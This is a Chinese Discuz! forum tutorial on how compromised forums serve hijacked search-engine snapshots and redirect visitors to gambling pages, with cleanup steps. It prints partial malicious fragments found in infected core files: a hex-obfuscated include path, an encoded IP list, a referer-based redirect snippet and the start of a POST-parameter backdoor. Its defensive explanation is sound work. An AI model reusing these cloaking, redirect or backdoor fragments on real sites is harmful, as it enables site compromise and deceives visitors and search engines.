收起左侧

[DZ教程] DZ网站挂马 搜索引擎快照劫持跳转【Discuz!论坛挂马的解决方法】

[复制链接]
查看: 605|回复: 0

272

主题

10万

帖子

15万

积分

用户组

管理员

管理员

帖子
100324
元宝
2038
注册时间2006-8-6
最后登录2019-6-26
QQ
错失你心 发表于 2019-4-13 22:08:53 | 显示全部楼层 |阅读模式
宝塔服务器面板,一键全能部署及管理,送你¥3188礼包,点我领取

马上注册查阅更多教程,下载海量资源,让你轻松玩做站

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
付费处理dz挂马、快照劫持,请联系Discuz!工程师


网站被挂马 搜索引擎被快照劫持跳转,清理被黑内容后,要被黑页面设置为404死链,并通过百度站长平台死链提交工具进行提交。(我们发现有些站点采用了将被黑页面跳转至首页的做法,非常不可取。)

00X0 网站被挂马 搜索引擎快照被劫持 网页被跳转
方法/步骤1:
如果你的网站被劫持到一些非法站点上导致网站被标记为非法、赌博时,可能直接会被各种浏览器和搜索引擎标记为“恶意网站”从而直接拦截。世间最痛苦的事莫过于此,特么的被人阴了...

苦心经营网站多年,树立口碑不容易。一日被黑,日日被劫持。从此以后用户通过搜索引擎打开你的网站不是色情就是赌博。正常业务啥都没了,也别再谈什么可信度和口碑了。网站被收录与网站无关且违禁的博彩关键词,如果处理不及时,措施不当等待你的将是搜索引擎的惩罚:网站排名与权重下降,轻则不收录重则被k。

00X1 站长们苦恼的问题
方法/步骤1:
网站被挂马该怎么解决?网站挂马的解决方法、网站被挂马怎么排查?网站老是被黑被挂马是什么原因?如何检测网站被挂马?网站快照被劫持怎么办?搜索引擎劫持怎么解决?百度快照被篡改劫持怎么回事?360快照被劫持怎么解决?discuz(DZ)被挂马快照被劫持的解决办法?dz论坛被挂马、快照劫持怎么防范?网页被跳转到博彩页面怎么办?诸如此类的问题不在罗列实在是太多了,下面就解决你的疑问!

00X2 挂马原理分析
方法/步骤1:
快照劫持、搜索跳转其实是黑帽SEO利用站中站脚本自动繁殖文章“能熟练应用快照劫持(流量、爬虫、权重) 搜索跳转到自动繁殖文章(站中站脚本)做自己关键词获取定向流量的方法”

搜索引擎快照劫持是通过代码来判断和识别蜘蛛访问的,若正常访问,则给出正常内容,若判断到是搜素引擎来访问,就给出另一个页面,使搜素引擎抓取快照进行改变,之后判断来路跳转。

[快照劫持挂马方法] 多为下面两种方式实现其劫持功能

第一种:放在上html声明内引导劫持快照

这种劫持要比放在源码中更加高明难以发现,查看源码是看不到任何痕迹的。



DZ网站挂马 搜索引擎快照劫持跳转【彻底解决】



网站被挂马 搜索引擎被快照劫持跳转,清理被黑内容后,要被黑页面设置为404死链,并通过百度站长平台死链提交工具进行提交。(我们发现有些站点采用了将被黑页面跳转至首页的做法,非常不可取。)

网站被挂马 搜索引擎快照被劫持 网页被跳转
方法/步骤1:
如果你的网站被劫持到一些非法站点上导致网站被标记为非法、赌博时,可能直接会被各种浏览器和搜索引擎标记为“恶意网站”从而直接拦截。世间最痛苦的事莫过于此,特么的被人阴了...

苦心经营网站多年,树立口碑不容易。一日被黑,日日被劫持。从此以后用户通过搜索引擎打开你的网站不是色情就是赌博。正常业务啥都没了,也别再谈什么可信度和口碑了。网站被收录与网站无关且违禁的博彩关键词,如果处理不及时,措施不当等待你的将是搜索引擎的惩罚:网站排名与权重下降,轻则不收录重则被k。

站长们苦恼的问题
方法/步骤1:
网站被挂马该怎么解决?网站挂马的解决方法、网站被挂马怎么排查?网站老是被黑被挂马是什么原因?如何检测网站被挂马?网站快照被劫持怎么办?搜索引擎劫持怎么解决?百度快照被篡改劫持怎么回事?360快照被劫持怎么解决?discuz(DZ)被挂马快照被劫持的解决办法?dz论坛被挂马、快照劫持怎么防范?网页被跳转到博彩页面怎么办?诸如此类的问题不在罗列实在是太多了,下面就解决你的疑问!


[快照劫持挂马方法] 多为下面两种方式实现其劫持功能

第一种:放在上html声明内引导劫持快照

这种劫持要比放在源码中更加高明难以发现,查看源码是看不到任何痕迹的。

dz挂马

dz挂马

方法/步骤2:
第二种:利用字典文件繁殖文章使用include包含引用提交给搜索引擎实施劫持

字典文件是一些关键词文件为文章生成提供资源,生成劫持静态文件放到要引用的文件中,根据SEO知识可知一般目录都不会太深,比较深的一般会有sitemap文件放在根目录引导蜘蛛爬取,平时注意下你的目录下sitemap.txt是否被篡改。

第一种是最简单粗暴的加到页面header文件里面引导蜘蛛。第二种相对更加隐蔽些,只需在Include中加上劫持目录即可。

Include引用代码:

@include($_SERVER[‘DOCUMENT_ROOT’].PACK('H*','2F646174612F737973646174612F30'));

dz快照劫持

dz快照劫持


方法/步骤3:
【处理方法】解密代码:2F646174612F737973646174612F30 解蜜后为:/data/sysdata/0查看此目录找到并清理木马文件。

dz挂马劫持

dz挂马劫持



00X3 DZ论坛挂马常被反复篡改的文件
方法/步骤1:
function_core.php、discuz_application.php、class_core.php、config_global.php注意排查。

一定有很多站长会遇到这个问题,不论怎么修改FTP密码,换服务器...class_core.php文件还是反复被挂马,class_core.php文件反复被挂马什么原因?一会是class_core.php被修改,一会是config_global.php被修改。那是因为木马后门已经扎根在你cms程序内部了,会时刻被唤醒使用。

class_core.php常被插入劫持以上部分代码,就是第一种html声明劫持。查看源码看不到任何信息,只能抓取诊断。

为防恶意使用,仅贴出部分代码。
  1. <font size="3">
  2. error_reporting(0);

  3. $S9 = explode("|",_decode('NTguMjQ3fDE4MC4xNTZ8MTgwLjE1NnwxMTcuMTc3fDU5LjE3MnwxNzEuODN8MTE0LjgyfDYxLjE3Mg=='));
  4. </font>
复制代码



dz挂马被黑

dz挂马被黑










Discuz!论坛快照被劫持解决方法
方法/步骤1:
1、进discuz后台找到工具-文件校验,找到最近被修改的php文件与源文件对比下。

2、dz的文件校验不会检查utility文件夹,除了upload里的文件,其他辅助功能文件一般用不到,如上传了请删除,避免被黑客利用。

3、使用后台文件校验看修改文件,UCcenter校验UC文件修改。

4、网站目录使用时间排序方式,查看最近修改的文件有没有可疑。

5、404态设置到位,可很大程度避免收录不存在的博彩劫持页面。

6、看网站目录内有没有被上传的tools目录或tools类型文件。

7、要有一查到底的决心,不然很难找到黑客埋藏的根基。

8、多方位加强防护,让劫持死于摇篮...

如何发现监测网站被劫持了
方法/步骤1:
站长们要学会从侧面发现快照劫持,不要仅仅在百度一个搜索引擎内site,要在多个搜索引擎内site,这样可以利用搜索引擎侧面检测反应网站快照劫持问题,只要有一个有劫持问题,就说明你网站一定被挂马了。并不是所有的搜索引擎都在同一时间内被劫持快照的,因为搜索引擎与搜索引擎算法技术的成熟程度是不一样的,还有就是你网站本身与搜索引擎爬虫友好度有关。

综上述解决快照劫持的大概步骤:校验文件-修改替换原始文件-设定404-举报/更新快照...

加强防范建议:插件不要随便使用,后门很多。

让你们见识下快照劫持字典文件、站中站脚本目录长什么样
方法/步骤1:
快照劫持页面内容多为博彩、赌具、特服小姐等黄赌毒违法信息或其他办证,公关小姐类灰色外推行业关键词。

Discuz!论坛挂马快照劫持

Discuz!论坛挂马快照劫持



搜索引擎快照劫持扩展阅读

方法/步骤1:
1、什么是搜索引擎快照劫持?

快照劫持:利用网站程序漏洞或爆破ftp,挂马篡改网页信息并主动post提交给搜索引擎,让其抓取收录,快照的内容多为博彩等推广内容。

2、搜索引擎快照劫持技术是什么?


搜索引擎劫持主要分快照劫持与跳转劫持,就是传说中的黑帽SEO手法快照劫持与流量劫持。其中快照劫持有的直接篡改原始网页挂马劫持,有的再生成新链接或上传大量静态页面挂黄赌毒博彩相关行业推广词;跳转劫持是使用跳转脚本让访问链接跳转到其他指定博彩站页面,主要是提高网站受众群体量与增加网站曝光度。

3、最新快照劫持及网页篡改网站入侵挂马问题

class_core.php文件插入跳转代码

  1. error_reporting(E_ALL);

  2. @error_reporting(1);

  3. @$ref = strtolower($_SERVER['HTTP_REFERER']);

  4. @$jump_ref = explode("|","haoso.|so.|haosou.|google.|soso.");

  5. foreach($jump_ref as $r){

  6. $r = trim($r);

  7. if(stristr($ref,$r)){

  8. if($_GET['tid']>50000){

  9. header('Location......
复制代码


66.jpg

方法/步骤2:
e
  1. rror_reporting(0);set_time_limit(0);

  2. $GuTou=@$_POST["gutou"];

  3. if($GuTou){

  4. $cc="";for($i=0;$i

  5. $cc.=urldecode("%".substr($GuTou,$i,2));

  6. }

  7. ?>
复制代码


方法/步骤3:
查被挂彩的语法,常用特征词【】【官网入口】...

使用语法 关键词 site:语法

77、.jpg


付费处理dz挂马、快照劫持,请联系Discuz!工程师

12年Discuz技术维护服务,论坛托管业务,专注Discuz!论坛搬家、数据迁移、论坛升级、技术维护等服务  QQ 569160956
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

精彩课程推荐

centos 7安装宝塔面板怎么挂载硬盘?

主讲:当流科技 服务器学院

互联云服务器 centos7怎么挂载硬盘和centos

主讲:当流科技 服务器学院

惠普服务器360 G8 ilo远程管理口怎么远程安

主讲:当流科技 服务器学院

2019年Discuz!论坛敏感关键词过滤词下载

主讲:ゾ銱ル鎯筜 Discuz!教程

【紧急安全更新】宝塔Linux面板 - 7月12日

主讲:当流科技 服务器学院

宝塔面板7.24 运维节免费领取3年宝塔面板插

主讲:当流科技 服务器学院

宝塔面板提示"请不要花样作死"怎么回事

主讲:当流科技 服务器学院

Windows系统怎么无损扩容数据盘?

主讲:当流科技 服务器学院
关闭

站长推荐上一条 /3 下一条

宝塔服务器面板,一键全能部署及管理,送你¥3188礼包,点我领取
申请认证站长,免费享受宝塔技术服务

商务合作

0551-66191059
569160956#qq.com
点击这里给我发消息
dz论坛/Discuz!论坛新手

关注微信公众号

QQ扫码 加 DZ技术群